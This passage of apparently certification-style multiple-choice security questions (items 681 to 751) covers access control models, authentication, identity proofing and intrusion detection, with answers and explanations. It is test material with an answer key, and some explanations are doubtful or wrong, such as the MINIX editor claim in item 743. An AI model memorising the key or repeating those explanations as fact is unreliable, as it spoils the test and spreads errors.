D. It is difficult to meet the security and safety requirements with flexible access control policies expressed in implicit constraints such as role-based access control (RBAC) and rule-based access control (RuBAC). Static separation-of-duty constraints require that two roles of an individual must be mutually exclusive, constraints must reduce the chances of collusion, and constraints must minimize the conflict of-interest in task assignments to employees.
681
Which of the following are compatible with each other in the pair in performing similar functions in information security? a. SSO and RSO b. DES and DNS c. ARP and PPP d. SLIP and SKIP
A. A single sign-on (SSO) technology allows a user to authenticate once and then access all the resources the user is authorized to use. A reduced sign-on (RSO) technology allows a user to authenticate once and then access many, but not all, of the resources the user is authorized to use. Hence, SSO and RSO perform similar functions. The other three choices do not perform similar functions. Data encryption standard (DES) is a symmetric cipher encryption algorithm. Domain name system (DNS) provides an Internet translation service that resolves domain names to Internet Protocol (IP) addresses and vice versa. Address resolution protocol (ARP) is used to obtain a node’s physical address. Point-to-point protocol (PPP) is a data-link framing protocol used to frame data packets on point-to-point lines. Serial line Internet protocol (SLIP) carries Internet Protocol (IP) over an asynchronous serial communication line. PPP replaced SLIP. Simple key management for Internet protocol (SKIP) is designed to work with the IPsec and operates at the network layer of the TCP/IP protocol, and works very well with sessionless datagram protocols.
682
How is identification different from authentication? a. Identification comes after authentication. b. Identification requires a password, and authentication requires a user ID. c. Identification and authentication are the same. d. Identification comes before authentication.
D. Identification is the process used to recognize an entity such as a user, program, process, or device. It is performed first, and authentication is done next. Identification and authentication are not the same. Identification requires a user ID, and authentication requires a password.
683
Accountability is not related to which of the following information security objectives? a. Identification b. Availability c. Authentication d. Auditing
B. Accountability is typically accomplished by identifying and authenticating system users and subsequently tracing their actions through audit trails (i.e., auditing).
684
Which of the following statements is true about mandatory access control? a. It does not use sensitivity levels. b. It uses tags. c. It does not use security labels. d. It reduces system performance.
D. Mandatory access control is expensive and causes system overhead, resulting in reduced system performance of the database. Mandatory access control uses sensitivity levels and security labels. Discretionary access controls use tags.
685
What control is referred to when an auditor reviews access controls and logs? a. Directive control b. Preventive control c. Corrective control d. Detective control
D. The purpose of auditors reviewing access controls and logs is to find out whether employees follow security policies and access rules, and to detect any violations and anomalies. The audit report helps management to improve access controls.
686
Logical access controls are a technical means of implementing security policy decisions. It requires balancing the often-competing interests. Which of the following trade-offs should receive the highest interest? a. User-friendliness b. Security principles c. Operational requirements d. Technical constraints
A. A management official responsible for a particular application system, subsystem, or group of systems develops the security policy. The development of an access control policy may not be an easy endeavor. User-friendliness should receive the highest interest because the system is designed for users, and the system usage is determined by whether the system is user-friendly. The other three choices have a competing interest in a security policy, but they are not as important as the user-friendliness issue. An example of a security principle is “least privilege.”
687
Which of the following types of passwords is counterproductive? a. System-generated passwords b. Encrypted passwords c. Non reusable passwords d. Time-based passwords
A. A password-generating program can produce passwords in a random fashion, rather than relying on user-selected ones. System generated passwords are usually hard to remember, forcing users to write them down. This defeats the whole purpose of stronger passwords. Encrypted passwords protect from unauthorized viewing or using. The encrypted password file is kept secure with access permission given to security administration for maintenance or to the passwords system itself. This approach is productive in keeping the passwords secure and secret. Non reusable passwords are used only once. A series of passwords are generated by a cryptographic secure algorithm and given to the user for use at the time of login. Each password expires after its initial use and is not repeated or stored anywhere. This approach is productive in keeping the passwords secure and secret. In time-based passwords, the password changes every minute or so. A smart card displays some numbers that are a function of the current time and the user’s secret key. To get access, the user must enter a number based on his own key and the current time. Each password is a unique one and therefore need not be written down or guessed. This approach is productive and effective in keeping the passwords secure and secret.
688
Which of the following issues is closely related to logical access controls? a. Employee issues b. Hardware issues c. Operating systems software issues d. Application software issues
A. The largest risk exposure remains with employees. Personnel security measures are aimed at hiring honest, competent, and capable employees. Job requirements need to be programmed into the logical access control software. Policy is also closely linked to personnel issues. A deterrent effect arises among employees when they are aware that their misconduct (intentional or unintentional) may be detected. Selecting the right type and access level for employees, informing which employees need access accounts and what type and level of access they require, and informing changes to access requirements are also important. Accounts and accesses should not be granted or maintained for employees who should not have them in the first place. The other three choices are distantly related to logical access controls when compared to employee issues.
689
Which of the following password methods are based on fact or opinion? a. Static passwords b. Dynamic passwords c. Cognitive passwords d. Conventional passwords
C. Cognitive passwords use fact-based and opinion-based cognitive data as a basis for user authentication. It uses interactive software routines that can handle initial user enrollment and subsequent cue response exchanges for system access. Cognitive passwords are based on a person’s lifetime experiences and events where only that person, or his family, knows about them. Examples include the person’s favorite high school teachers’ names, colors, flowers, foods, and places. Cognitive password procedures do not depend on the “people memory” often associated with the conventional password dilemma. However, implementation of a cognitive password mechanism could cost money and take more time to authenticate a user. Cognitive passwords are easier to recall and difficult for others to guess. Conventional (static) passwords are difficult to remember whether user-created or system-generated and are easy to guess by others. Dynamic passwords change each time a user signs on to the computer. Even in the dynamic password environment, a user needs to remember an initial code for the computer to recognize him. Conventional passwords are reusable whereas dynamic ones are not. Conventional passwords rely on memory.
690
Which of the security codes is the longest, thereby making it difficult to guess? a. Passphrases b. Passwords c. Lockwords d. Passcodes
A. Passphrases have the virtue of length (e.g., up to 80 characters), making them both difficult to guess and burdensome to discover by an exhaustive trial-and-error attack on a system. The number of characters used in the other three choices is smaller (e.g., four to eight characters) than in passphrases. All four security codes are user identification mechanisms. Passwords are uniquely associated with a single user. Lockwords are system-generated terminal passwords shared among users. Passcodes are a combination of a password and an ID card.
691
Anomaly detection approaches used in intrusion detection systems (IDS) require which of the following? a. Tool sets b. Skill sets c. Training sets d. Data sets
C. Anomaly detection approaches often require extensive training sets of system event records to characterize normal behavior patterns. Skill sets are also important for the IT security analyst. Tool sets and data sets are not relevant here because the tool sets may contain software or hardware, and the data sets may contain data files and databases.
692
What is a marking assigned to a computing resource called? a. Security tag b. Security label c. Security level d. Security attribute
B. A security label is a marking bound to a resource (which may be a data unit) that names or designates the security attributes of that resource. A security tag is an information unit containing a representation of certain security-related information (e.g., a restrictive attribute bitmap). A security level is a hierarchical indicator of the degree of sensitivity to a certain threat. It implies, according to the security policy enforced, a specific level of protection. A security attribute is a security-related quality of an object. Security attributes may be represented as hierarchical levels, bits in a bitmap, or numbers. Compartments, caveats, and release markings are examples of security attributes.
693
Which of the following is most risky? a. Permanent access b. Guest access c. Temporary access d. Contractor access
C. The greatest problem with temporary access is that once temporary access is given to an employee, it is not reverted to the previous status after the project has been completed. This can be due to forgetfulness on the part of both the employee and the employer, or to the lack of a formal system for change notification. There can be a formal system of change notification for permanent access, and guest or contractor accesses are removed after the project has been completed.
694
Which of the following deals with access control by group? a. Discretionary access control b. Mandatory access control c. Access control list d. Logical access control
A. Discretionary access controls deal with the concept of control objectives, or control over individual aspects of an enterprise’s processes or resources. They are based on the identity of the users and of the objects they want to access. Discretionary access controls are implemented by one user or the network/system administrator to specify what levels of access other users are allowed to have. Mandatory access controls are implemented based on the user’s security clearance or trust level and the particular sensitivity designation of each file. The owner of a file or object has no discretion as to who can access it. An access control list is based on which user can access what objects. Logical access controls are based on a user-supplied identification number or code and password. Discretionary access control is by group association whereas mandatory access control is by sensitivity level.
695
Which of the following provides a finer level of granularity (i.e., more restrictive security) in the access control process? a. Mandatory access control b. Discretionary access control c. Access control list d. Logical access control
B. Discretionary access control offers a finer level of granularity in the access control process. Mandatory access controls can provide access to broad categories of information, whereas discretionary access controls can be used to fine-tune those broad controls, override mandatory restrictions as needed, and accommodate special circumstances.
696
For identity management, which of the following is supporting the determination of an authentic identity? 1. X.509 authentication framework 2. Internet Engineering Task Force’s PKI 3. Secure DNS initiatives 4. Simple public key infrastructure a. 1 only b. 2 only c. 3 only d. 1, 2, 3, and 4
D. Several infrastructures are devoted to providing identities and the means of authenticating those identities. Examples of these infrastructures include the X.509 authentication framework, the Internet Engineering Task Force’s PKI (IETF’s PKI), the secure domain name system (DNS) initiatives, and the simple public key infrastructure (SPKI).
697
Which one of the following methodologies or techniques provides the most effective strategy for limiting access to individual sensitive files? a. Access control list and both discretionary and mandatory access control b. Mandatory access control and access control list c. Discretionary access control and access control list d. Physical access control to hardware and access control list with discretionary access control
A. The best control for protecting sensitive files is using mandatory access controls supplemented by discretionary access controls and implemented through the use of an access control list. A complementary mandatory access control mechanism can prevent the Trojan horse attack that can be allowed by the discretionary access control. The mandatory access control prevents the system from giving sensitive information to any user who is not explicitly authorized to access a resource.
698
Which of the following security control mechanisms is simplest to administer? a. Discretionary access control b. Mandatory access control c. Access control list d. Logical access control
B. Mandatory access controls are the simplest to use because they can be used to grant broad access to large sets of files and to broad categories of information. Discretionary access controls are not simple to use due to their finer level of granularity in the access control process. Both the access control list and logical access control require a significant amount of administrative work because they are based on the details of each individual user.
699
Which of the following use data by row to represent the access control matrix? a. Capabilities and profiles b. Protection bits and access control list c. Profiles and protection bits d. Capabilities and access control list
A. Capabilities and profiles are used to represent the access control matrix data by row and connect accessible objects to the user. On the other hand, a protection bit-based system and access control list represents the data by column, connecting a list of users to an object.
700
The process of identifying users and objects is important to which of the following? a. Discretionary access control b. Mandatory access control c. Access control d. Security control
A. Discretionary access control is a means of restricting access to objects based on the identity of subjects and/or groups to which they belong. In a mandatory access control mechanism, the owner of a file or object has no discretion as to who can access it. Both security control and access control are too broad and vague to be meaningful here.
701
Which of the following is a hidden file? a. Password aging file b. Password validation file c. Password reuse file d. Shadow password file
D. The shadow password file is a hidden file that stores users’ hashed passwords and is readable only by the root user. The password validation file uses the shadow password file before allowing the user to log in. The password-aging file contains an expiration date, and the password reuse file prevents a user from reusing a previously used password. The files mentioned in the other three choices are not hidden.
702
From an access control point of view, which of the following are examples of task transactions and separation of conflicts of interest? 1. Role-based access control 2. Workflow policy 3. Rule-based access control 4. Chinese Wall policy a. 1 and 2 b. 1 and 3 c. 2 and 4 d. 3 and 4
C. Workflow policy is a process that operates on rules and procedures. A workflow is specified as a set of tasks and a set of dependencies among the tasks, and the sequencing of these tasks is important (i.e., task transactions). The various tasks in a workflow are usually carried out by several users in accordance with organizational rules represented by the workflow policy. The Chinese Wall policy addresses conflict-of-interest issues, with the objective of preventing illicit flows of information that can result in conflicts of interest. The Chinese Wall policy is simple and easy to describe but difficult to implement. Both role- and rule-based access control can create conflict-of-interest situations because of incompatibility between employee roles and management rules.
703
For identity management, which of the following qualifies as continuously authenticated? a. Unique ID b. Signed X.509 certificate c. Password with access control list d. Encryption
D. A commonly used method to ensure that access to a communications session is controlled and authenticated continuously is the use of encryption mechanisms to prevent loss of control of the session through session stealing or hijacking. Other methods such as signed X.509 certificates and password files associated with access control lists (ACLs) can bind entities to unique IDs. Although these other methods are good, they do not prevent the loss of control of the session.
704
What is a control to prevent an unauthorized user from starting an alternative operating system? a. Shadow password b. Encryption password c. Power-on password d. Network password
C. A computer system can be protected through a power-on password, which prevents an unauthorized user from starting an alternative operating system. The other three types of passwords mentioned do not have the preventive nature of a power-on password.
705
The concept of least privilege is based on which of the following? a. Risk assessment b. Information flow enforcement c. Access enforcement d. Account management
A. An organization practices the concept of least privilege for specific job duties and information systems, including specific responsibilities, network ports, protocols, and services in accordance with risk assessments. These practices are necessary to adequately mitigate risk to organizations’ operations, assets, and individuals. The other three choices are specific components of access controls.
706
Which of the following is the primary technique used by commercially available intrusion detection and prevention systems (IDPS) to analyze events to detect attacks? a. Signature-based IDPS b. Anomaly-based IDPS c. Behavior-based IDPS d. Statistical-based IDPS
A. There are two primary approaches to analyzing events to detect attacks: signature detection and anomaly detection. Signature detection is the primary technique used by most commercial systems; however, anomaly detection is the subject of much research and is used in a limited form by a number of intrusion detection and prevention systems (IDPS). Behavior-based and statistical-based IDPS are part of anomaly-based IDPS.
707
For electronic authentication, which of the following is an example of a passive attack? a. Eavesdropping b. Man-in-the-middle c. Impersonation d. Session hijacking
A. A passive attack is an attack against an authentication protocol where the attacker intercepts data traveling along the network between the claimant and verifier but does not alter the data. Eavesdropping is an example of a passive attack. A man-in-the-middle (MitM) attack is incorrect because it is an active attack on the authentication protocol run in which the attacker positions himself between the claimant and verifier so that he can intercept and alter data traveling between them. Impersonation is incorrect because it is an attempt to gain access to a computer system by posing as an authorized user. It is the same as masquerading, spoofing, and mimicking. Session hijacking is incorrect because it is an attack that occurs during an authentication session within a database or system. The attacker disables a user’s desktop system, intercepts responses from the application, and responds in ways that probe the session. Man-in-the-middle, impersonation, and session hijacking are examples of active attacks. Note that MitM attacks can be passive or active depending on the intent of the attacker because there are mild MitM or strong MitM attacks.
708
Which of the following complementary strategies to mitigate token threats raise the threshold for successful attacks? a. Physical security mechanisms b. Multiple security factors c. Complex passwords d. System and network security controls
B. Token threats include masquerading, off-line attacks, and guessing passwords. Multiple factors raise the threshold for successful attacks. If an attacker needs to steal the cryptographic token and guess a password, the work factor may be too high. Physical security mechanisms are incorrect because they may be employed to protect a stolen token from duplication. Physical security mechanisms can provide tamper evidence, detection, and response. Complex passwords are incorrect because they may reduce the likelihood of a successful guessing attack. By requiring the use of long passwords that do not appear in common dictionaries, attackers may be forced to try every possible password. System and network security controls are incorrect because they may be employed to prevent an attacker from gaining access to a system or installing malicious software (malware).
709
Which of the following is the correct description of roles between a registration authority (RA) and a credential service provider (CSP) involved in identity proofing? a. The RA may be a part of the CSP. b. The RA may be a separate entity. c. The RA may be a trusted relationship. d. The RA may be an independent entity.
C. The RA may be a part of the CSP, or it may be a separate and independent entity; however, a trusted relationship always exists between the RA and CSP. Either the RA or CSP must maintain records of the registration. The RA and CSP may provide services on behalf of an organization or may provide services to the public.
710
What is spoofing? a. Active attack b. Passive attack c. Surveillance attack d. Exhaustive attack
A. Spoofing is a tampering activity and is an active attack. Sniffing is a surveillance activity and is a passive attack. An exhaustive attack (i.e., brute force attack) consists of discovering secret data by trying all possibilities and checking for correctness. For a four-digit password, you might start with 0000 and move to 0001 and 0002 until 9999.
711
Which of the following is an example of infrastructure threats related to the registration process required in identity proofing? a. Separation of duties b. Record keeping c. Impersonation d. Independent audits
C. There are two general categories of threats to the registration process: impersonation and either compromise or malfeasance of the infrastructure (RAs and CSPs). Infrastructure threats are addressed by normal computer security controls such as separation of duties, record keeping, and independent audits.
712
In electronic authentication, which of the following is not trustworthy? a. Claimants b. Registration authorities c. Credentials services providers d. Verifiers
A. Registration authorities (RAs), credential service providers (CSPs), verifiers, and relying parties are ordinarily trustworthy in the sense of being correctly implemented and not deliberately malicious. However, claimants or their systems may not be trustworthy, or else their identity claims could simply be trusted. Moreover, whereas RAs, CSPs, and verifiers are normally trustworthy, they are not invulnerable and could become corrupted. Therefore, protocols that expose long-term authentication secrets more than is absolutely required, even to trusted entities, should be avoided.
713
An organization is experiencing excessive turnover of employees. Which of the following is the best access control policy under these situations? a. Rule-based access control (RuBAC) b. Mandatory access control (MAC) c. Role-based access control (RBAC) d. Discretionary access control (DAC)
C. Employees can come and go, but their roles do not change, such as a doctor or nurse in a hospital. With role-based access control, access decisions are based on the roles that individual users have as part of an organization. Employee names may change, but the roles do not. This access control is the best for organizations experiencing excessive employee turnover. Rule-based access control and mandatory access control are the same because they are based on specific rules relating to the nature of the subject and object. Discretionary access control is a means to restrict access to objects based on the identity of subjects and/or groups to which they belong.
714
The principle of least privilege supports which of the following? a. All or nothing privileges b. Super-user privileges c. Appropriate privileges d. Creeping privileges
C. The principle of least privilege refers to granting users only those accesses required to perform their duties. Only the concept of “appropriate privilege” is supported by the principle of least privilege.
715
What is password management an example of? a. Directive control b. Preventive control c. Detective control d. Corrective control
B. Password management is an example of preventive controls in that passwords deter unauthorized users from accessing a system unless they know the password through some other means.
716
Which one of the following access control policies uses an access control matrix for its implementation? a. Discretionary access control (DAC) b. Mandatory access control (MAC) c. Role-based access control (RBAC) d. Access control lists (ACLs)
A. A discretionary access control (DAC) model uses an access control matrix in which the names of users (subjects) are placed in each row and the names of objects (files or programs) in each column of the matrix. The other three choices do not use an access control matrix.
717
Access control mechanisms include which of the following? a. Directive, preventive, and detective controls b. Corrective, recovery, and preventive controls c. Logical, physical, and administrative controls d. Management, operational, and technical controls
C. Access control mechanisms include logical (passwords and encryption), physical (keys and tokens), and administrative (forms and procedures) controls. Directive, preventive, detective, corrective, and recovery controls are controls by action. Management, operational, and technical controls are controls by nature.
718
Which one of the following access control policies uses security labels? a. Discretionary access control (DAC) b. Mandatory access control (MAC) c. Role-based access control (RBAC) d. Access control lists (ACLs)
B. Security labels and interfaces are used to determine access based on the mandatory access control (MAC) policy. A security label is the means used to associate a set of security attributes with a specific information object as part of the data structure for that object. Labels could be designated as proprietary data or public data. The other three choices do not use security labels.
719
Intrusion detection and prevention systems serve as which of the following? a. Barrier mechanism b. Monitoring mechanism c. Accountability mechanism d. Penetration mechanism
B. Intrusion detection and prevention systems (IDPS) serve as monitoring mechanisms, watching activities, and making decisions about whether the observed events are suspicious. IDPS can spot attackers circumventing firewalls and report them to system administrators, who can take steps to prevent damage. Firewalls serve as barrier mechanisms, barring entry to some kinds of network traffic and allowing others, based on a firewall policy.
720
Which of the following can coexist in providing strong access control mechanisms? a. Kerberos authentication and single sign-on system b. Kerberos authentication and digital signature system c. Kerberos authentication and asymmetric key system d. Kerberos authentication and digital certificate system
A. When Kerberos authentication is combined with single sign-on systems, it requires establishing and operating privilege servers. Kerberos uses symmetric key cryptography, and the other three choices are examples of asymmetric key cryptography.
721
Uses of honeypots and padded cells have which of the following? a. Social implications b. Legal implications c. Technical implications d. Psychological implications
B. The legal implications of using honeypot and padded cell systems are not well defined. It is important to seek guidance from legal counsel before deciding to use either of these systems.
722
From security and safety viewpoints, safety enforcement is tied to which of the following? a. Job rotation b. Job description c. Job enlargement d. Job enrichment
B. Safety is fundamental to ensuring that the most basic of access control policies can be enforced. This enforcement is tied to the job description of an individual employee through access authorizations (e.g., permissions and privileges). Job description lists job tasks, duties, roles, and responsibilities expected of an employee, including safety and security requirements. The other three choices do not provide safety enforcements. Job rotation makes an employee well-rounded because it broadens an employee’s work experience, job enlargement adds width to a job, and job enrichment adds depth to a job.
723
Which of the following is the correct sequence of actions in access control mechanisms? a. Access profiles, authentication, authorization, and identification b. Security rules, identification, authorization, and authentication c. Identification, authentication, authorization, and accountability d. Audit trails, authorization, accountability, and identification
C. Identification comes before authentication, and authorization comes after authentication. Accountability is last where user actions are recorded.
724
The principle of least privilege is most closely linked to which of the following security objectives? a. Confidentiality b. Integrity c. Availability d. Nonrepudiation
B. The principle of least privilege deals with access control authorization mechanisms, and as such the principle ensures integrity of data and systems by limiting access to data/information and information systems.
725
Which of the following is a major vulnerability with the Kerberos model? a. User b. Server c. Client d. Key-distribution-server
D. A major vulnerability with the Kerberos model is that if the key distribution server is attacked, every secret key used on the network is compromised. The principals involved in the Kerberos model include the user, the client, the key-distribution-center, the ticket-granting service, and the server providing the requested services.
726
For electronic authentication, identity proofing involves which of the following? a. CSP b. RA c. CSP and RA d. CA and CRL
C. Identity proofing is the process by which a credential service provider (CSP) and a registration authority (RA) validate sufficient information to uniquely identify a person. A certification authority (CA) is not involved in identity proofing. A CA is a trusted entity that issues and revokes public key certificates. A certificate revocation list (CRL) is not involved in identity proofing. A CRL is a list of revoked public key certificates created and digitally signed by a CA.
727
A lattice security model is an example of which of the following access control policies? a. Discretionary access control (DAC) b. Non-DAC c. Mandatory access control (MAC) d. Non-MAC
B. A lattice security model is based on a nondiscretionary access control (non-DAC) model. A lattice model is a partially ordered set for which every pair of elements (subjects and objects) has a greatest lower bound and a least upper bound. The subject has the greatest lower bound, and the object has the least upper bound.
728
Which of the following is not a common type of electronic credential? a. SAML assertions b. X.509 public-key identity certificates c. X.509 attribute certificates d. Kerberos tickets
A. Electronic credentials are digital documents used in authentication that bind an identity or an attribute to a subscriber’s token. Security assertion markup language (SAML) is a specification for encoding security assertions in the extensible markup language (XML). SAML assertions have nothing to do with electronic credentials because they can be used by a verifier to make a statement to a relying party about the identity of a claimant. An X.509 public-key identity certificate is incorrect because binding an identity to a public key is a common type of electronic credential. An X.509 attribute certificate is incorrect because binding an identity or a public key with some attribute is a common type of electronic credential. Kerberos tickets are incorrect because they are encrypted messages binding the holder with some attribute or privilege, which is a common type of electronic credential.
729
Registration fraud in electronic authentication can be deterred by making it more difficult to accomplish or by increasing the likelihood of which of the following? a. Direction b. Prevention c. Detection d. Correction
C. Making it more difficult to accomplish or increasing the likelihood of detection can deter registration fraud. The goal is to make impersonation more difficult.
730
Which one of the following access control policies treats users and owners as the same? a. Discretionary access control (DAC) b. Mandatory access control (MAC) c. Role-based access control (RBAC) d. Access control lists (ACLs)
A. A discretionary access control (DAC) mechanism enables users to grant or revoke access to any of the objects under their control. As such, users are said to be the owners of the objects under their control. Users and owners are different in the other three choices.
731
For electronic authentication protocol threats, which of the following are assumed to be physically able to intercept authentication protocol runs? a. Eavesdroppers b. Subscriber impostors c. Impostor verifiers d. Hijackers
A. Eavesdroppers are assumed to be physically able to intercept authentication protocol runs; however, the protocol may be designed to render the intercepted messages unintelligible, or to resist analysis that would allow the eavesdropper to obtain information useful to impersonate the claimant. Subscriber impostors are incorrect because they need only normal communications access to verifiers or relying parties. Impostor verifiers are incorrect because they may have special network capabilities to divert, insert, or delete packets. But, in many cases, such attacks can be mounted simply by tricking subscribers with incorrect links or e-mails or on Web pages, or by using domain names similar to those of relying parties or verifiers. Therefore, the impostors do not necessarily need to have any unusual network capabilities. Hijackers are incorrect because they must divert communications sessions, but this capability may be comparatively easy to achieve today when many subscribers use wireless network access.
732
Which of the following is not commonly detected and reported by intrusion detection and prevention systems (IDPS)? a. System scanning attacks b. Denial-of-service attacks c. System penetration attacks d. IP address spoofing attacks
D. An attacker can send attack packets using a fake source IP address but arrange to wiretap the victim’s reply to the fake address. The attacker can do this without having access to the computer at the fake address. This manipulation of IP addressing is called IP address spoofing. A system scanning attack occurs when an attacker probes a target network or system by sending different kinds of packets. Denial-of-service attacks attempt to slow or shut down targeted network systems or services. System penetration attacks involve the unauthorized acquisition and/or alteration of system privileges, resources, or data.
733
In-band attacks against electronic authentication protocols include which of the following? a. Password guessing b. Impersonation c. Password guessing and replay d. Impersonation and man-in-the-middle
C. In an in-band attack, the attacker assumes the role of a claimant with a genuine verifier. These include a password guessing attack and a replay attack. In a password guessing attack, an impostor attempts to guess a password in repeated logon trials and succeeds when he can log onto a system. In a replay attack, an attacker records and replays some part of a previous good protocol run to the verifier. In the verifier impersonation attack, the attacker impersonates the verifier and induces the claimant to reveal his secret token. A man-in-the-middle attack is an attack on the authentication protocol run in which the attacker positions himself between the claimant and verifier so that he can intercept and alter data traveling between them.
734
Which of the following access control policies or models provides a straightforward way of granting or denying access for a specified user? a. Role-based access control (RBAC) b. Access control lists (ACLs) c. Mandatory access control (MAC) d. Discretionary access control (DAC)
B. An access control list (ACL) is an object associated with a file and containing entries specifying the access that individual users or groups of users have to the file. ACLs provide a straightforward way to grant or deny access for a specified user or groups of users. Other choices are not that straightforward in that they use labels, tags, and roles.
735
What is impersonating a user or system called? a. Snooping attack b. Spoofing attack c. Sniffing attack d. Spamming attack
B. Spoofing is an unauthorized use of legitimate identification and authentication data such as user IDs and passwords. Intercepted user names and passwords can be used to impersonate the user on the login or file transfer server host that the user accesses. Snooping and sniffing attacks are the same in that sniffing is observing the packets passing by on the network. Spamming is posting identical messages to multiple unrelated newsgroups on the Internet or sending unsolicited e-mail indiscriminately to multiple users.
736
Which one of the following access control policies or models requires security clearances for subjects? a. Discretionary access control (DAC) b. Mandatory access control (MAC) c. Role-based access control (RBAC) d. Access control lists (ACLs)
B. A mandatory access control (MAC) restricts access to objects based on the sensitivity of the information contained in the objects and the formal authorization (i.e., clearance) of subjects to access information of such sensitivity.
737
Which of the following is not an example of attacks on data and information? a. Hidden code b. Inference c. Spoofing d. Traffic analysis
C. Spoofing is using various techniques to subvert IP-based access control by masquerading as another system by using its IP address. Attacks such as hidden code, inference, and traffic analysis are based on data and information.
738
Honeypot systems do not contain which of the following? a. Event triggers b. Sensitive monitors c. Sensitive data d. Event loggers
C. The honeypot system is instrumented with sensitive monitors, event triggers, and event loggers that detect unauthorized accesses and collect information about the attacker’s activities. These systems are filled with fabricated data designed to appear valuable.
739
Intrusion detection and prevention systems look at security policy violations: a. Statically b. Dynamically c. Linearly d. Nonlinearly
B. Intrusion detection and prevention systems (IDPS) look for specific symptoms of intrusions and security policy violations dynamically. IDPS are analogous to security monitoring cameras. Vulnerability analysis systems take a static view of symptoms. Linearly and nonlinearly are not applicable here because they are mathematical concepts.
740
For biometric accuracy, which of the following defines the point at which the false rejection rates and the false acceptance rates are equal? a. Type I error b. Type II error c. Crossover error rate d. Type I and II error
C. In biometrics, crossover error rate is defined as the point at which the false rejection rates and the false acceptance rates are equal. Type I error, called false rejection rate, is incorrect because genuine users are rejected as imposters. Type II error, called false acceptance rate, is incorrect because imposters are accepted as genuine users.
741
Which one of the following does not help in preventing fraud? a. Separation of duties b. Job enlargement c. Job rotation d. Mandatory vacations
B. Separation of duties, job rotation, and mandatory vacations are management controls that can help in preventing fraud. Job enlargement and job enrichment do not prevent fraud because they are not controls; their purpose is to expand the scope of an employee’s work for a better experience and promotion.
742
Access triples used in the implementation of Clark-Wilson security model include which of the following? a. Policy, procedure, and object b. Class, domain, and subject c. Subject, program, and data d. Level, label, and tag
C. The Clark-Wilson model partitions objects into programs and data for each subject, forming a subject/program/data access triple. The generic model for the access triples is <subject, program, data>.
743
The KPT Company is analyzing authentication alternatives. The company has 10,000 users in 10 locations with five different databases of users. The current authentication access controls are a mix of UNIX and Microsoft related tools. KPT priorities include security, cost, scalability, and transparency. Symbolic link (symlink) attacks do not exist on which of the operating systems? a. UNIX b. Windows c. LINUX d. MINIX
B. Symbolic links are links on UNIX, MINIX, and LINUX systems that point from one file to another file. A symlink vulnerability is exploited by making a symbolic link from a file to which an attacker does have access to a file to which the attacker does not have access. Symlinks do not exist on Windows systems, so symlink attacks cannot be performed against programs or files on those systems. MINIX is a variation of UNIX and is small in size. A major difference between MINIX and UNIX is the editor, where the former is faster and the latter is slower.
744
The KPT Company is analyzing authentication alternatives. The company has 10,000 users in 10 locations with five different databases of users. The current authentication access controls are a mix of UNIX and Microsoft related tools. KPT priorities include security, cost, scalability, and transparency. Which one of the following is not an authentication mechanism? a. What the user knows b. What the user has c. What the user can do d. What the user is
C. “What the user can do” is defined in access rules or user profiles, which come after a successful authentication. The other three choices are part of an authentication process.
745
The KPT Company is analyzing authentication alternatives. The company has 10,000 users in 10 locations with five different databases of users. The current authentication access controls are a mix of UNIX and Microsoft related tools. KPT priorities include security, cost, scalability, and transparency. Which of the following provides strong authentication for centralized authentication servers when used with firewalls? a. User IDs b. Passwords c. Tokens d. Account numbers
C. For basic authentication, user IDs, passwords, and account numbers are used for internal authentication. Centralized authentication servers such as RADIUS and TACACS/TACACS+ can be integrated with token-based authentication to enhance firewall administration security.
746
The KPT Company is analyzing authentication alternatives. The company has 10,000 users in 10 locations with five different databases of users. The current authentication access controls are a mix of UNIX and Microsoft related tools. KPT priorities include security, cost, scalability, and transparency. Which of the following does not provide robust authentication? a. Kerberos b. Secure RPC c. Reusable passwords d. Digital certificates
C. Robust authentication means strong authentication that should be required for accessing internal computer systems. Robust authentication is provided by Kerberos, one-time passwords, challenge-response exchanges, digital certificates, and secure RPC. Reusable passwords provide weak authentication.
747
The KPT Company is analyzing authentication alternatives. The company has 10,000 users in 10 locations with five different databases of users. The current authentication access controls are a mix of UNIX and Microsoft related tools. KPT priorities include security, cost, scalability, and transparency. Which of the following authentication types is most effective? a. Static authentication b. Robust authentication c. Intermittent authentication d. Continuous authentication
D. Continuous authentication protects against impostors (active attacks) by applying a digital signature algorithm to every bit of data sent from the claimant to the verifier. Also, continuous authentication prevents session hijacking. Static authentication uses reusable passwords, which can be compromised by replay attacks. Robust authentication includes one-time passwords and digital signatures, which can be compromised by session hijacking. Intermittent authentication is not useful because of gaps in user verification.
748
The KPT Company is analyzing authentication alternatives. The company has 10,000 users in 10 locations with five different databases of users. The current authentication access controls are a mix of UNIX and Microsoft related tools. KPT priorities include security, cost, scalability, and transparency. What is the basis for a two-factor authentication mechanism? a. Something you know and a password b. Something you are and a fingerprint c. Something you have and a key d. Something you have and something you know
D. A two-factor authentication uses two different kinds of evidence. For example, a challenge-response token card typically requires both physical possession of the card (something you have, one factor) and a PIN (something you know, another factor). The other three choices have only one factor to authenticate.
749
The KPT Company is analyzing authentication alternatives. The company has 10,000 users in 10 locations with five different databases of users. The current authentication access controls are a mix of UNIX and Microsoft related tools. KPT priorities include security, cost, scalability, and transparency. Individual accountability does not include which of the following? a. Unique identifiers b. Access rules c. Audit trails d. Policies and procedures
D. A basic tenet of IT security is that individuals must be accountable for their actions. If this is not followed and enforced, it is not possible to successfully prosecute those who intentionally damage or disrupt systems or to train those whose actions have unintended adverse effects. The concept of individual accountability drives the need for many security safeguards, such as unique (user) identifiers, audit trails, and access authorization rules. Policies and procedures indicate what to accomplish and how to accomplish objectives. By themselves, they do not exact individual accountability.
750
The KPT Company is analyzing authentication alternatives. The company has 10,000 users in 10 locations with five different databases of users. The current authentication access controls are a mix of UNIX and Microsoft related tools. KPT priorities include security, cost, scalability, and transparency. Which of the following user identification and authentication techniques depend on reference profiles or templates? a. Memory tokens b. Smart tokens c. Cryptography d. Biometric systems
D. Biometric systems require the creation and storage of profiles or templates of individuals wanting system access. This includes physiological attributes such as fingerprints, hand geometry, or retina patterns, or behavioral attributes such as voice patterns and handwritten signatures. Memory tokens and smart tokens involve the creation and distribution of token/PINs and data that tell the computer how to recognize valid tokens or PINs. Cryptography requires the generation, distribution, storage, entry, use, and archiving of cryptographic keys.
751
The KPT Company is analyzing authentication alternatives. The company has 10,000 users in 10 locations with five different databases of users. The current authentication access controls are a mix of UNIX and Microsoft related tools. KPT priorities include security, cost, scalability, and transparency. Some security authorities believe that re-authentication of every transaction provides stronger security procedures. Which of the following security mechanisms is least efficient and least effective for re-authentication? a. Recurring passwords b. Nonrecurring passwords c. Memory tokens d. Smart tokens
